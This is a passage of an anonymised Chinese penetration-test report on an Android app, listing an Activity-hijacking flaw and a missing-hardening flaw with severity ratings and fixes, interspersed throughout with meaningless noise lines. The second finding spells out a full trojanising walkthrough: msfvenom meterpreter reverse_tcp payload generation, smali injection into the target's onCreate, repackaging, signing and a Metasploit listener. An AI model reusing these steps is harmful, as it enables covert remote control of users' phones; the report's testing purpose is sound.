% w9 O5 i- e( U' B: y' D 表1-2 测试结果 2 a4 z% T" S3 b, x8 b
: z) K: m x/ M$ R4 T% p2 q # h) t9 L1 C( ?# T
3 ~2 c" d n3 Z9 O. e
, a% X4 a& O. z& {
$ i A+ g$ w- @ m4 H. n. c
4 Q( B4 B/ N' \% e
& I+ q1 }$ S2 a& ? V4 \
7 O0 K( W+ b8 _, R: \
( d6 J( h4 [! Q
7 O: H9 }1 y _ @) J, ]) F/ g: B* b* b8 ^' w3 [
2 检测结果
- O7 N; l( x1 c6 e& x
) E* h% N! P; M `+ U1 g
9 |5 N( i# h, k& A) l" R- T* o4 P+ S" }8 s# d
/ s# ^ p4 T1 u4 k7 I( a5 J+ _
1 |4 E4 c3 \& w4 P1 c6 F
2.1 某某某 - z4 G% Z z9 Q0 b: p
5 e1 z6 _8 i q, n5 ^
$ d9 [2 U0 B- f# X
7 a/ ~" _% {0 T3 D$ o2 m
; X5 K& _2 R0 U9 Q% y- @9 S' E
, f5 h: S0 C, L# U+ `2 p; k: @ 2.1.1检测目标 ' {1 w l1 T; J+ f' B# I7 p. |7 i
4 J5 O7 Y& g, w1 U
& z/ T6 M; o$ N* L. |
" u( F' a0 _% E1 V8 o2 W
$ z" I* a7 k, i1 |* u. s. ~5 s
% S+ F. L$ @0 d4 m4 q, X; ?% I: b; } 目标地址: 某某某某某某APP - M. h! c% Q% L7 s0 o1 {
7 j* `+ f6 z- W: q( A. p Z * T0 Q* @% s, D2 b
/ _8 {9 O+ H; s( U M
0 b8 Y( }5 Q- n( J9 U" @, D7 ~
4 U& c( K" t/ M7 R- A3 p7 i
2.1.2检测结果
9 i! N4 x/ l# A
8 V$ K \5 v% u8 _3 W
+ p" J2 K* p) B+ w
7 d7 B8 F6 X- B& l" {0 g; a
2 @' i+ N. U" ?: o$ X' Q( G h+ q4 L
2.1.2.1 " D0 \2 f0 Y; K8 s3 U6 l; B
9 F9 [+ i g9 A0 g
! N* g5 u. e5 |/ h! d$ O& n1 T3 d! U! e1 \1 |7 K
# A' B% t$ Z# F) Z8 b# ?
5 @$ P" ^5 ]% T5 x1 `1 S 漏洞链接地址:某某某某某某APP 3 j9 k# e/ ^5 _! Q4 Y( z6 r1 W6 D
, `- V3 G0 t- l) Q9 i
L3 G% v8 x: e5 E+ t( F. l `6 v9 ^4 |3 o
. n; _( s3 @7 G2 C
/ I/ ~! {' B( G% D# ?% m5 N / E# a5 r" Q, V f! e
- s9 S q! z9 A- e/ U# ? ' }8 _9 L) A- c, K5 ~6 }! O
% p9 N! a2 {% W7 Z9 M" l: y, p
* t: w3 l1 v2 b& _" ?* ~- j
0 e7 y: h7 V1 k/ _
漏洞分析及取证:
7 g1 O5 q1 y2 B9 g9 G- N/ x! d% @. B Y* ~; h7 I
# D2 g+ ?" T: d5 R% D
) ]$ K- |: a' {9 V5 t* Z& |9 g/ k
! d1 E2 `& {; d- K+ M c/ z5 m) n
/ I( H K5 ^( T7 s3 n) H! ^ L; _, D 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 I2 X9 J1 i `8 ^$ @
7 _$ P. N. q) @! [: m/ I& [' } ! Z+ w; q3 Q- H; o) \0 M
9 ]1 u2 j1 t2 v8 d
. X2 |2 _8 `: b! [+ f' a
3 B ]3 L/ l( C: h+ Y
- R, w: Y7 ^( Z) Z- g
: [# k1 k7 W' T4 f 6 n( v; J, b( o0 T; Q8 | v
" W f+ ], H" U& t
; s/ T6 ^9 u8 g) D" p' S; ` H- o& R/ b% b, f
5 P; Y9 x- M3 F) u* [
$ e! k$ {- W! q" i+ D
0 P$ v4 z9 h. {. c9 g' n+ `
) x% `$ A: x5 q% P
5 N. @* M8 g0 W+ h& i& d/ F2 R) O
# H% G* d+ _* K* i* Z3 D" F) w - \, x* j7 }5 L" X& ~6 i4 R
+ L4 J* t* ~, N
1 o8 o, Y5 N, B, A" Y
# f9 q5 s- j' f; ]3 c/ Q! s8 t $ Y9 A4 X" W5 Q& z3 y, T9 p7 V5 I2 l
6 G9 J# R/ U2 R$ J. R
/ ?+ m( S8 ` G* F- s& e, s; R, M7 k c' ]7 J3 ]' @7 P" M
/ _; v$ d0 d: W, O- y# m
" [7 x0 r- `! ]7 O. T) q 1 V2 I6 ]" n# c9 s$ G+ V+ |
. X% q( D* J( L7 Z: z
7 ?) y$ c' ^* Q7 P. i
4 s: s- p& e+ i! ?! }. S5 u5 W ! @$ p0 Z4 q3 @0 [/ F% ~4 S" T
. R' X- i" X$ c ; @6 g, `/ w6 B9 f G e
1 w, j1 x* S5 I/ y# @ 漏洞危害:高
* S7 a+ a- D1 ?7 Y5 X/ i! X4 B- E8 A, A7 `. H0 E6 J/ ~
' K. e1 T- v, \8 ]/ E9 ]5 a5 H/ ^! U: ?7 x
" u4 Z0 K* s. g+ ~: m( \; U& }. \. \+ N
* B% V$ L2 t: J/ k: V0 b, I
$ R7 I4 D: B' g" ? , b+ X+ G& o" ]5 o( C
U: k K2 {* Z i
^1 x4 d* m& d8 X3 U7 {1 u; [3 ~; A F3 U: w+ q) ^. _" A
# T2 |' w4 o. |" t
4 M. S8 R7 _, l) @& r
/ @/ Q5 N& m6 s5 F S3 P- B0 d
* c; j' n2 O5 I7 e1 B9 r& l 严重程度 . ~8 Y7 N7 P/ W, T/ U3 |0 Z3 n Z) N9 y
$ p+ h+ q% i' z7 e& p e 1 J- P0 j& W% `+ @ z! m
5 \0 K- h* P/ C | # ]8 x+ e: b* t$ W) b
% W$ q X5 t& T8 o' M& M6 l$ p 2 A0 V. t6 k8 A0 [3 |# l* `% K/ b
2 P5 y& e( b, n, d( D$ n
4 {' b5 Q& l4 Q4 E4 v& V: e, ~0 [% G9 f+ n( T1 H
高 , L2 W8 K3 Z6 V
# s4 P+ o% Q+ Q% V. r
. F8 Y. L2 r3 C& g. Z& c; y
; F X# @ Q9 y% t1 ]% k |
) B* S+ z6 {* {! ]: i; ^
2 Q- \5 c. r) i0 i& c ( A2 C- s( ` l. L. d0 ?
+ P5 I' c( j v8 j# r' S6 m
- { U! {% m5 q8 K
, m; v6 U+ ^+ ^+ X+ y ■ 3 Y i0 W0 t: V, n' E) J3 H# v
5 l1 G) S+ `/ ? ]. `
( ?- u% J9 R4 p- n; i/ ?
9 Q: _8 I7 a3 ]+ h j3 J | " q! `+ f- N1 a
4 V: S* z6 i( I7 C
" l; l6 J$ q' ?8 `/ X
% I) Q' ?3 `2 i$ Y' o' G
# K/ c7 K* F5 t$ i, b
, N& c- Y/ L4 ]% M7 P a4 V 中 8 v s* l& s+ c/ b
' j+ z" x8 ^( I$ i; h. R3 Z
" e& T$ @6 w. X& Q& u
" W. R( L* r/ y3 r# j | 8 ]" r& {- i, T- ^2 x
: \! @2 P9 W' f9 K: L4 N# S # c7 ~. p2 @ v( e6 B
1 z9 Y% U3 m4 c5 a
2 f3 Y3 B% W+ W! S
! p0 r; @, M& K
$ _4 y6 s1 K! q+ G/ R* e/ W8 g6 E. ^& P% B; G8 G: N
; ~* j7 P$ L; W! T
3 F- e0 B# ]; }; {( F | 4 o+ G m/ V. M( u) C+ k
/ }! h8 ?2 B2 ~* x; F( l& e " L) R3 k8 {, M2 ?' }8 T
I. o2 h+ L& S- k ; g" o3 }' [1 ?* Z
2 j6 R7 }$ o2 C- E d% C/ [* n
低
" j6 {7 g! ]9 J! m. E5 N; ]
& v# a/ |0 B, T8 a0 J# u ) l7 {8 G }7 H; h2 k
& Q( Z9 O9 p( e9 b, V8 v
| ; Y& h" ?# Z0 f( E$ y
6 H1 \! i A" K" q5 u/ _
$ X# m, W( H6 W R! i" \, a: e& v; D
& w/ `; H6 z6 X; ~3 G- G7 P& d: }3 v$ P: k
2 r5 f+ j* U: `' _, o4 U0 u
! R- y8 g3 b+ r) N
0 L( C: i" }$ y7 q {
3 U; ~6 L: z9 W9 d: [) K9 ?. A. I" p" z7 t7 P
|
# w( g) z' H+ M: y; F' I8 z" B0 i8 m* |2 ~. B- c
3 S+ [5 _1 {6 H0 \7 K: T% I
6 }% Q4 t, c& O0 J! Y8 I 0 H0 b6 Y& e& X! m$ P
! E" }( O5 V. l0 q: H q ( }2 n# x; D$ ^- b- T/ C8 L
9 `4 q( ~+ I9 q
6 w" }+ a9 I, l' B* }- b% \ D$ Z: }! \ U
8 s b' i- y6 P% ~6 N6 ~
, F4 V" A: b; B- ?- o1 P5 v3 W# B ! O) ?" O( j; b Z% E' T
3 W3 [% @0 @( w7 f ) S- M5 z7 Z# N3 I) B3 w5 `
& X2 K/ j: ^/ @# k# a
7 K+ ?! Y* T$ o+ r
6 z3 X1 Y+ i' l& |+ P: ~/ O& Z# [ 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ) D5 S3 o2 Y0 \* b' j
9 e7 i$ q2 l: O0 t" t4 f0 o
! Y- G, z" L" t' E4 m1 v' r2 q6 w- c( |' h
" f- H/ [) ^' ]: o9 p$ t4 b
d8 |( |: N$ j5 f, R- r g0 a9 Y
( _% R1 J2 D) C
6 e" p" G! A+ ?) y' B) g & B/ r2 [9 L- K/ `6 }
/ {& F7 R5 \; a
5 \4 h7 t" P( x0 |. @+ p+ a4 v8 h: {5 ?3 m
" b5 P# l2 [5 a
9 C; D- F. p- X * C( n4 V }, P7 ]" B) F0 M5 a
z$ _8 k; J) x+ P2 [$ l7 _ ! K. P$ I8 @2 D, f+ u
7 f; [7 l7 X1 ?: l0 z
2.1.2.2 ( s! ^6 o# _7 s
) z* M6 C9 |% x6 R5 W5 r ( J1 s9 i0 K+ t) I# t
{" j+ z# k1 S0 L
( G. j( g; P3 |" W/ z
* I# H* @+ C8 D; m1 X E8 n1 L
漏洞链接地址:某某某某某某APP . G a; d: Z' I d# T5 I
/ O9 m& \5 _1 B. k
: \8 e3 Z, q- ]8 Q8 S. @, k( \) s' `' Z8 Y9 J2 F
3 u" l5 b- j5 Z$ y6 s
2 d* L1 i7 M) F/ s4 ~
漏洞分析及取证: , B3 a" d ^ R8 \ }
) G/ n1 ^# X( ~' I# ~0 M5 d$ z* L 5 U+ l7 [3 l7 D! Q
3 F, s3 ^" _; d9 d+ Q" F $ H0 W* g0 L! g
3 g! R) m/ ~9 I8 ^ 通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
4 \( J) J- }- T3 A& s" F6 i* N1 ]! X! u% T" n* n, m1 h
, }: d) v. X. C) J+ m% m ~- s
* ^6 m. g/ m; g; O' S( C
" V1 F( O+ h2 g$ d; R
/ d4 D0 Q/ x' I5 n) @, l 用Metasploit 生成木马 apk
$ ~, o& a) O% N# }; I* @
- t; R0 z3 E" J 0 O$ x3 _. O3 V3 I1 I0 \8 K
4 v$ H9 {9 z4 A9 e5 Y; I! {* j
8 y0 x6 V1 x3 f k8 b
% l: W( ?! C+ k# q/ Z msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
. z, |& R, x: X: H1 s% \
9 W$ @- P. G0 ] 8 s/ _0 k; t! I
( L9 w$ G$ I7 A! J3 |
S; r$ `. Z) s7 V/ A, O, y. v- ^
& |* a" U& w3 C& A6 B7 O2 c! u 反编译目标apk和木马apk 5 G) E: K. _1 ?) w* y
7 \7 @& C2 V O
1 b% Z2 i9 \# y- n3 {. Y
: O6 }$ [* m7 q- h& [: e; S
# y [. E: A# k
9 C. m7 B0 p+ x4 |, {. X apktool d target.apk 4 t; @* P; h+ d/ m9 T1 N1 `+ h
6 K1 w V1 k1 H1 c( l$ `2 t
apktool d cockhorse.apk
- ?1 K0 S: L# d3 u3 Q( N9 `) z* Z2 B* I$ B& ?+ l" ?
5 _9 E, r; H& f8 g; Z
2 N6 B6 t: H3 n* t' y1 B# p
\/ b& H* {6 W1 Y' C7 V* S, n n0 s) b( P. y P: Y
木马 apk 注入目标 apk 2 {4 {. G% |! N3 j% h) z( q# U
3 }9 T! t6 e S# }( _
0 T' O8 Z& z) o5 b3 W0 n6 [2 K5 R1 D" F( s
0 ^. e+ A0 X, p$ T9 m8 \2 x$ m9 x b1 ]7 ^7 g: i! O/ y
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
+ R* [) C8 l+ P, n
S4 G# k# H# V3 F% Y5 e invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
$ X7 ` [: c; \, q: H2 T% k7 V$ q0 k: a. X1 o6 A% S
1 B% u* b' }, r" M8 c
. l: ?6 ^7 H, d; }0 K ' W2 G0 G5 n6 u
8 z6 Q8 ]# A2 b+ D$ k' a6 ]
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 2 L& o7 d/ p+ ?. c7 `& m' ~% L
( r7 J0 K: }( }2 M
/ N! y$ \; W% I* C2 D: n
7 Z9 ]- X6 P+ x3 _! z& {, H
) {( @# q/ G% V! f) p) ?7 j+ D% ^
( J- o% ~9 o, |9 H 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 9 o4 @+ Z7 A# P6 g# Y; e
8 y6 V0 b- D# T$ j) O * i# f2 F s5 T& F
8 }# j; E: E3 |
4 d* C! A( z1 y8 y2 k- T! q
8 y( K! Z) E8 l1 R, A2 r8 d9 `1 R 回编译生成最终 apk
' E- J/ I8 _( ]8 A( w+ r2 L! e
7 Z! b" U) u! |) `$ L- s 8 [& T# V" `( J1 F
" d+ a" Q$ s* q, m @ B$ S
2 ?" m w/ N+ U7 r3 p
( ~$ S9 z4 h1 h: |4 `6 I 重新打包 $ m4 d" m. E, u
* Y- G) z; F5 @1 y e
8 S0 x7 @* e, }, D/ C6 \
: t! j4 p1 o# y. v/ S9 b8 L' Q. R( K Y1 X- L8 w/ d9 b
/ j2 D3 o0 c# j2 ] apktool b -o repackage.apk target_app_floder o( R* n0 B7 I
. C8 {( X- o$ v# Q 4 t% Y0 @( Q7 _
5 S. A" t5 k, [, L
1 c \% n* o; ?0 g9 b1 _6 D" G1 A' s
创建签名文件,有的话可忽略此步骤
1 e' ^, }0 V) M- _# \
8 M- n% e0 Z7 s
- i1 k' `: E. A
9 G! \9 \, \- P3 L
' U- I' t; A9 S" x/ _% ~* d/ T% F5 k+ @$ `- m$ z5 Z$ f' B& e
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
* V2 U- M8 d3 i; L2 j' N- B) X- c: b, Y: c/ {% J" b; _
' d* |" B$ m, K; z5 _" o K6 F$ K! h
( d- J( N* }; P o
( u/ _4 N2 W% G6 U+ F
签名,以下任选其一
; O4 v* \: U+ F0 L1 N
, C* n7 E- B8 }. L* H$ J 5 T( @4 z7 E" g$ T2 W
( s9 Z W# z& [8 x- b7 G- i7 K
6 h: c2 j3 e9 E0 p/ K7 ?$ I& G! R0 e' [, t% h, I1 A/ b
jarsigner 方式 ; y& D& D1 x, x% x6 I! D
" H, R& ?) d+ ^) Y7 }* m ' ?5 g9 Q4 P( T! [- v' E
& N" S. Y, P. M6 ]5 z3 }
) U9 ?" g$ {% l8 z/ [* u/ p3 t. e; y7 Q7 b+ O
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ) _7 w* _+ m) N& Y5 [* I
0 q& s [; e( [7 ~ : E( n* @5 F! N$ k0 C
$ Y0 q1 r3 T) [: q/ c
, m: J9 c$ g$ \* h; j4 F6 E# L$ \6 A. K# n' r0 O
apksigner 方式 - |# Y# M/ L' p' |4 X
. P7 g, f3 F/ S1 Y) n. J j
% I$ ~) h) u: T/ |3 F5 b
4 Z; Q e. U/ R0 t, R
* e6 y! v+ f6 b- l ]: z
0 U! ?% Z- |4 O) {1 x apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 9 v! [, q3 K# w8 E
, N+ `8 r& ]! d" h/ o H- [. @
8 V0 p# c7 ]5 v X3 i+ r0 x9 e9 b; `* D$ Z/ K+ y( [; E
: l3 H9 [7 w- n% o7 a
! r8 D* |! W: X+ y3 y7 g$ ` O 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! Z* r* D0 a+ {: w$ z1 d* G+ S
. f( m- x. M7 s3 `
( c; h- E" c: ?. P5 e2 I1 R6 K7 P6 Q: c
2 u: q- U5 K5 |! C9 [: o i V I0 D: Z' i+ C
验证,以下任选其一 . W' z: e" C* l, o0 D" M, W
6 A+ Y8 h" ]; w( P
- p. a: [" K8 ^5 _
7 _" {7 l( N) m$ `' q% Q
! t6 O- T$ E# f1 j1 R8 `3 b: f1 e# U& }" K7 R7 V0 d. Q
jarsigner方式 1 b* B& x5 z. W9 |% T* u
, s/ x. i( p3 F8 O
O3 c: f0 B7 m1 |: G8 d. Q
" p% x: h' e, e3 H 7 g5 Z8 S; a3 | _
9 f- L5 J5 I4 k; b5 e. ` jarsigner -verify repackaged.apk
- y' u4 R6 c/ j, n# d1 r9 p+ L) U, \- P6 }4 Q# O
0 e, J* D% u& p. j- @, N {0 v. n4 b+ X& g2 f
& Z$ ]) l* u& R$ ], R
* j: T; t/ v: z7 S+ ^ apksigner 方式 2 |# H; o g; ~8 O
8 D& i L) j( Z" f& Z ; h- I0 E1 K, j0 w
' j# ^# n+ s1 Z8 R! P
+ C) Z9 i! N0 `5 ?& W% l1 M
! l, W1 F# h% R2 d Q5 F apksigner verify -v --print-certs repackaged.apk
$ c; i+ M8 v9 d" L) m
" D' m* F3 U/ b7 e% N1 |! {
Y0 b( u( |& a( S. E: J. S5 _8 Q2 i3 y# V& m D$ h
1 y+ X+ V- I! ]. x5 r9 `$ G
2 C* f- C' m$ J keytool方式 ( o% a: O; i+ b; u
8 s! b6 I1 E4 ?' w
1 J Z, ]: I$ l( S! r
: \3 K# ~: v2 D1 h. t. ^; g6 u
7 i5 R8 T; b7 J: T$ p0 t% x
/ m- X! @ M, h0 ?5 Y6 _( _ keytool -printcert -jarfile repackaged.apk
& V) [* _5 [. u& C7 c( o, I
/ x t6 v9 E2 f O' d0 D : \, c5 d3 d+ v! G
; Z0 ?+ ?% X- j9 |, }0 C/ H! ?
) |' U/ n. V" M5 S% f2 O6 d; H
3 W7 G! x2 E6 Z& }" f& f3 i4 w 对齐
2 |$ e+ @! R7 H7 [* ?+ h) ?, }! ?4 l' {. W' g# x' ?9 F
5 E ~' c8 }3 x! S$ R6 E3 R& G, z
( R1 i$ T- s, V. A
2 C4 W3 l/ u3 f) c( w0 a
4 d2 K% ]; ^/ {& k& g% T" P 字节对齐优化
" z4 j$ |% p" ?4 N6 y9 x! [; ?! i
5 [1 C# q# q& m \* f0 K* b% q$ V / l% I; U f% T2 q. H" Z
6 K o& I- u+ Q7 E+ d
: _* O& C) a) q# W# z) o/ B
* s: d) J; {3 ~2 r. F zipalign -v 4 repackaged.apk final.apk
0 d R* ^' I- ?3 {9 v
- J0 j; x! h! ?) U " _! F, k5 h2 Q0 p- d6 E4 D
* g# S" s% @: w
1 q- Q1 {, W i, q# U
P. ^$ [* E: B+ L" u 检查是否对齐
# i) r& x& X) N
Q+ D; Z* H% E8 f# i' O3 W7 I 3 x0 v$ x. q1 f6 F [% m/ _
/ [5 {8 B3 r' H$ f
9 _( a7 R O* d/ u2 J1 D1 c
* w( ~2 y) L- s4 w8 J9 A8 o
zipalign -c -v 4 final.apk
8 i& Q1 C& s! O! A) W
+ G t- G) t- M, U3 D
. B$ L! q! t! Z( k2 P, L& y6 {
6 y% _0 Y9 g1 m: `: Y. O( t # l' T9 {7 S* O* X
3 U0 [5 M ~2 P r7 g
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 ( M* ?1 u9 l2 S% u; o# q
' g8 Z, u7 d8 a3 ^1 t/ g9 F# V ( r" E( I2 r+ J7 E3 |
; _) i, c7 N8 q' ~+ @
3 x/ a5 [: @- b( C/ }2 g
- h) o. K- w3 L5 `2 [0 i 启动Metasploit控制台,配置参数等待上线
' P, g& `, D( n1 b" _" U# C0 a! N/ C& \% @0 f3 D& O+ H
$ k+ ^* h8 K& \+ ~( `5 ^& x
9 M# t- G: J. q9 X( c
4 e6 o' y: n9 B6 j* l6 N }! b W1 F+ @* v2 s
在终端依次输入如下命令
' U) B p2 P1 `) k2 n: a, q! ?0 K- ]9 ?
& [/ G. M# n# f$ M( h/ G8 K5 g
1 y) m; }7 T- z& Z + b- W* j7 A3 E2 }# e/ [6 k7 ]) I
) `: ?' f3 B6 D' ?) J9 P4 \
msfconsole & f( S/ m* A$ v4 O3 [# \
/ H: z1 R8 [* O) {; m
# X# h& S5 h) f$ j8 u
" c# t& M; Q! n
& M1 I( \* }4 ^7 D
0 N! G6 Q4 P2 @- O4 B use exploit/multi/handler
5 X- C8 S, s8 F* k) ]3 s/ F; O# |* l$ z# i( [5 m# S" R9 E3 v
1 Q5 I6 ?0 @$ S9 Y# o+ c4 j
% a1 \) E0 D2 O& l! o0 k
. ]" U( E6 r& J1 a, n7 n
9 |4 S! s1 U. Y D8 Y set PAYLOAD android/meterpreter/reverse_tcp 4 q6 L8 e R( x8 p$ o+ C
2 Q3 f* O& f) h7 N# {# T1 P( |
- s% c$ E9 E% \' B: M
9 j5 q9 o1 T2 \) q. I: u0 ? 4 h* S# _1 Y/ z1 P
3 h. m4 Q- W0 U3 P
set LHOST 192.xxx.xx.xx ! Z7 y, w2 E$ H# `+ F/ @
/ J" T6 L F+ y1 d% p* U* z( a
/ {6 a+ p8 \4 A" q5 t. }1 W% }/ U& _1 |+ H+ p: m$ v
. J* e4 X) W H: q
' s0 ]; ~+ q; h3 K6 T- ~& l set LPORT 4444
3 F7 }( y @1 h$ i; @
* t9 a/ b5 D5 B3 B x . x8 O( H* {) i
6 A2 M8 x) O) ^4 z
7 ^7 P) M" l: t5 s+ N1 ^7 Y' D
7 P$ M4 t! v! o exploit ! M- F* B) _9 X* O3 G! v, ]
~1 T( f% e F, E6 a
$ G: ]9 X$ i) I; R2 o
0 K& o7 t# K7 D+ A ) H& N/ C0 s# K9 Q9 L
% v9 Y' y: \* h* x& C8 z8 z! Y
之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
7 y; l# A. |4 v" p* z/ O& u) j5 e- U2 K5 z }2 e
4 S) A! ], L% l: [ W- z
9 R' j* W- v! _8 h+ A
, t* l" E, ^/ Y3 a. X7 L1 j
9 `) F" k6 @6 r4 U' {, |5 m 漏洞危害:中
9 ]6 N$ U' H3 ?- j( s/ A1 a
3 \. H) _- }5 s9 P
: v6 b8 B- H) ~8 c% K$ W; B
& ~7 o, _! f4 K3 ?) A 5 X: O' c3 ~3 I+ _+ @
* V4 G* i9 z6 N, H
. [# c# B! \1 p/ m6 _2 i* [; h& ?. Z, W L
/ E3 T! a V. [9 v: T" l
) ]8 X" ]* x s
6 l' q* Y+ i a; Y, m, s* r( V
7 S. N+ f8 R7 T3 }- z( Y4 R: a & ]/ {* ]+ I U, d
! |% T- [+ K8 y% B5 T & s, \/ S: f' I1 b9 ^
2 z' J. F' k! x6 @
2 z& `9 @2 X) r# q# C$ h3 ]
( `, t9 |9 ?- S9 p" p( _
严重程度 * W/ ~ i% }* m& v
! F2 B9 \ f, H6 t+ J& t
3 Y) K: V% q/ i9 ~$ l& K! S/ ]# k
9 u6 M; D7 ^: S |
* s! C6 q, M7 K: n' w1 ]9 o* L8 c8 H, r
, r/ |# S0 M u8 ~" V: F
# e% g0 u! N6 L$ B$ ^ ( T6 S- J) t4 B' B
+ \8 U8 s1 n. y! [4 R5 y1 w
高 ) @, T; R) J8 A9 Q% E1 A0 }1 n
2 O$ A! P! _/ E4 I7 [
' Q4 A; {) |+ W7 o+ t: R1 n- [% y4 r2 s' `( j/ X5 i! E
|
/ l% }* e+ X# ` L, @" z
0 k* V0 D6 h' ~0 g2 `! q9 G& s
; ~9 `! W* M0 U, r- ~
% Z6 U' [* F2 n6 c( ^6 m4 W9 f$ D * ~$ @9 O) a8 B3 \% J8 f
& b) ^% G0 y3 g ■ $ ~' R- Q$ I/ r) U- I) r7 I
) b4 |8 f; q2 S$ M% {3 D j/ B
# z6 }- T. H8 B9 N/ w+ v# t7 k$ l7 V: `! I/ a
|
$ t) F' @/ C9 x" B( Q U* F) Y
) Y' D5 X& k1 \! }, a3 @& e
, w' L" ]0 B- W: Q
3 x- W, k* C$ C0 R3 M& ~ : U* m7 @0 N3 C4 [
2 s/ j2 Q4 q) t
中 & ?, H' N- i% f$ \
! w! A% S9 l9 Y$ k; P
$ J+ e; ?; I# c+ I1 i: s/ T
: G' _! V" L& D4 M4 H
| " J/ u# w4 A1 O; D! [8 V% Z7 N
6 @) |+ ^) t ^) n8 [
$ g; @% u+ d9 D$ e& w6 F
0 P- f1 g& | ~ H: i
0 b! S( F. _' _8 t) N1 ]0 J
. ^* a1 b8 q- u0 @ 8 T, ?4 [' M3 C! H- `) f) b
. p! L$ u0 l6 A) n% [
8 d" @- f4 o3 q4 H c& C: ^' W. [+ P& L/ F
0 k6 E5 @( A1 O3 H* n
$ `0 n8 ^* F8 l; \$ U | 7 T) V3 u; U1 W" N2 S" ~9 V
Y$ L1 S8 T7 i+ X. x
: B% G, t3 K, ?0 N
! j" f9 @4 a* G/ E. q o& _; V
6 s% K. r7 f8 K$ ]% j/ D" { J
9 h. k6 ]$ v/ x, H6 ? 低 ; {( P; @$ @/ S" f% C2 L
. q; n' A: G$ J1 u0 u* l
' e& f4 `' @( Z' Z2 H, M* m% l
* h. Y/ B! Y9 n8 O
| / X a) v1 l* B" z5 B! ]
0 M$ j- s! @0 k% z0 D 4 ]8 T: {9 v/ ^6 e
- M1 }1 ~: P0 {! O( W+ J( m . U- S. X- K# m! [2 Q! h, r4 x
1 A, m6 H9 W0 ~: u/ h' M& z
7 R0 J% t5 M, W( Z6 ?1 @
" X/ [& A( Q7 W) i, N4 W . r$ J( j2 ^/ u3 S7 o) [. E
( J( ]! @5 y( K6 H% X
1 h2 b5 D% G% u
/ @9 _6 }. M: X: M$ _9 `: E1 X
|
; y6 C& J5 h4 f4 o4 H6 W, U
: W' m0 V0 F3 P / @; x+ B. f3 z0 n5 V
" O/ X7 u& _3 q
( i3 v0 S: @5 [3 W5 L+ m
: S m- S8 g0 {6 d3 }
# y) D+ V1 ~- {0 h& a
- {- C; l% r5 }! ^& E6 {# o ) O9 L" ~) P! L; M* R
% d$ s8 r4 m% v% ?. F
( I9 a4 V* e) H! c e% J, l0 r# G
8 Y" Q' ^ L, L* ^$ t' h. E 8 Z# f/ y$ Q4 {4 {
. @' f+ ^2 Q, n. B# S! n" u; K
# E. z) Q: r$ w! n3 K
h) [5 X( x/ k! R# K ~, I , s0 p& D8 |, W' D6 p. j& }2 z8 Z1 s
j) `% _% e E: f+ O' T o 修复方法: 4 }# H/ b4 W: P; W1 b
5 R9 s# _& P4 r % v3 u% v& B, J1 @( H4 q8 q6 P }) a
! m: u/ d, r( F0 E . P5 G m4 s r/ Z* v1 v3 m7 p
& C! h$ D h' s3 l1 E 1.在 APP 启动时应做签名校验防止二次打包。 Q* F! ]9 Q0 E! L
5 x6 g3 F w- F7 w7 \
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 3 T$ ~' e" P8 d( g
. m% ?2 X) ?- e, I9 K J
8 W/ O+ [9 e5 r) T- x8 P
5 k/ o& y, h5 A8 c - ?2 Q) Z t& z
2 t" ^- s, b2 o5 f# ?
. p: z! x# U) G' w* S
( j& z. c: F! Q: S( K* v
! ?6 W- b4 F0 Q q& ^) F
; b$ c; B3 z0 H& l8 i/ ` ) y% q; T* T" f, U) @8 y7 s' j6 D
, @' ]4 O& _4 {1 G
# w* \8 @3 o7 ~. r6 f/ ?8 u
0 }) p8 g+ k$ ~- d# y+ r" X% _ 1 M6 ]- K3 f; S2 Y4 |
5 O( g2 a& }' I; a @$ s- W9 ~ 3 b* g- h/ r0 x$ y1 T
$ ]' y4 k. D2 c! m
; ^# Q6 |( U+ }. E. I# j
) A4 D+ S% b4 O4 J9 ? |